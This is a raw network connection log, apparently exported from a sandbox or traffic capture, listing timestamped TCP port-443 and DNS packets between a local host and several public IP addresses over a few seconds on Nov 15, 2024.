                                                                                      Nov 15, 2024 18:08:47.236640930 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.257031918 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.303333998 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.557559967 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.557621956 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.557641983 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.557696104 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.557740927 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.557756901 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.557769060 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.557806969 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.558451891 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.558624029 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.558650017 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.558716059 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.570291996 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.570329905 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.570349932 CET49715443192.168.2.1652.149.20.212
                                                                                      Nov 15, 2024 18:08:47.570358992 CET4434971552.149.20.212192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.698141098 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.698379993 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.698401928 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.700042963 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.700114012 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.701028109 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.701031923 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.701126099 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.701248884 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.701265097 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.701317072 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.701328993 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.704806089 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.704871893 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.705144882 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.705224037 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.745632887 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.745641947 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.745650053 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.793623924 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.987359047 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.987440109 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.987509966 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.987750053 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.987776041 CET4434971891.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:47.987791061 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.987826109 CET49718443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:47.989433050 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:48.031344891 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.260592937 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:48.260689020 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.260766029 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:48.260936022 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:48.260956049 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.353576899 CET49678443192.168.2.1620.189.173.10
                                                                                      Nov 15, 2024 18:08:48.655674934 CET49678443192.168.2.1620.189.173.10
                                                                                      Nov 15, 2024 18:08:48.975172997 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.975229025 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.975280046 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:48.975306034 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.975502014 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:48.975553036 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:48.977092981 CET49717443192.168.2.1691.211.222.250
                                                                                      Nov 15, 2024 18:08:48.977108955 CET4434971791.211.222.250192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.005228043 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.005254030 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.005315065 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.005557060 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.005570889 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.140563011 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.140866995 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:49.140928984 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.142371893 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.142462015 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:49.143367052 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:49.143450975 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.198731899 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:49.198748112 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.246699095 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:49.262643099 CET49678443192.168.2.1620.189.173.10
                                                                                      Nov 15, 2024 18:08:49.517672062 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:49.654118061 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.654421091 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.654437065 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.655895948 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.655965090 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.657262087 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.657361031 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.657552958 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.657557011 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.709745884 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.815499067 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.815588951 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.815666914 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.817523003 CET49722443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.817544937 CET44349722104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.824919939 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.824976921 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.825077057 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.825294971 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:49.825316906 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.846018076 CET6257353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:49.850847006 CET53625731.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:49.850927114 CET6257353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:49.851568937 CET6257353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:49.856426954 CET53625731.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.441468954 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.441889048 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.441956043 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.442475080 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.442898989 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.442992926 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.443101883 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.472664118 CET49678443192.168.2.1620.189.173.10
                                                                                      Nov 15, 2024 18:08:50.477225065 CET53625731.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.477905989 CET6257353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:50.483115911 CET53625731.1.1.1192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.483175993 CET6257353192.168.2.161.1.1.1
                                                                                      Nov 15, 2024 18:08:50.483365059 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.584918976 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585041046 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585124969 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585206985 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.585228920 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585256100 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585295916 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.585707903 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585789919 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.585855961 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.585890055 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.586246967 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.586288929 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.586306095 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.586404085 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.702946901 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.703377962 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.703458071 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.703574896 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.703644991 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.703732967 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.703751087 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.704210043 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.704303980 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.704339981 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.704355001 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.704427004 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.704719067 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.744776011 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.744837999 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.792674065 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.824026108 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824368000 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824464083 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824502945 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824537039 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824564934 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.824564934 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.824601889 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824615955 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824696064 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.824734926 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.824858904 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.825356960 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.826250076 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.826317072 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.826332092 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.872688055 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.872749090 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.920682907 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.940623999 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.940891981 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.940957069 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.940979958 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.941030979 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.941071987 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.941080093 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.941118956 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.941359043 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.941374063 CET44349723104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.941389084 CET49723443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.953056097 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:50.953098059 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.953253984 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:50.953443050 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:50.953457117 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.960165977 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.960241079 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:50.960762978 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.960916996 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:50.960932016 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.573363066 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.573688984 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.573714018 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.575210094 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.575283051 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.575781107 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.575865030 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.575989962 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.576000929 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.576594114 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.576834917 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.576905012 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.580482960 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.580573082 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.580868006 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.580981016 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.580993891 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.581053019 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.622663021 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.622685909 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.622745037 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.670763969 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.715619087 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.715751886 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.715818882 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.715843916 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.715940952 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.716124058 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.716181040 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.716190100 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.716252089 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.716295004 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.716626883 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.716690063 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.716696978 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.730597973 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.730881929 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.730946064 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.730958939 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.731040001 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.731097937 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.731105089 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.731178045 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.731231928 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.731237888 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.735101938 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.735184908 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.735193014 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.748831987 CET62577443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.748919010 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.749202967 CET62577443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.749357939 CET62577443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.749375105 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.766686916 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.766709089 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.781673908 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.812654018 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.834747076 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.834948063 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.835010052 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.835028887 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.835274935 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.835335970 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.835342884 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.835753918 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.835810900 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.835815907 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.836282015 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.836440086 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.836446047 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.848330975 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.848521948 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.848592997 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.848615885 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.848647118 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.848829031 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.848850965 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.849282980 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.849339962 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.849348068 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.849823952 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.849884033 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.849891901 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.850291967 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.850393057 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.850452900 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.850460052 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.850500107 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.850545883 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.850560904 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.850588083 CET44362576104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.850625992 CET62576443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.855287075 CET62578443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.855339050 CET44362578104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.855531931 CET62578443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.855977058 CET62578443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:51.855993986 CET44362578104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.890659094 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.890677929 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.936661959 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.953562975 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.953717947 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.953774929 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.953789949 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.954001904 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.954047918 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.954055071 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.954519033 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.954560041 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.954574108 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.954580069 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:51.954638958 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:51.955003023 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.000674963 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:52.043410063 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.043514013 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.043565035 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:52.043581963 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.073999882 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.074050903 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:52.074057102 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.074071884 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.074105024 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:52.074115038 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.074249983 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.074294090 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:52.074413061 CET62575443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:52.074425936 CET44362575104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.404665947 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.404922962 CET62577443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:52.404989004 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.405467033 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.405754089 CET62577443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:52.405848980 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.405922890 CET62577443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:52.451333046 CET44362577104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:52.469552040 CET44362578104.18.95.41192.168.2.16
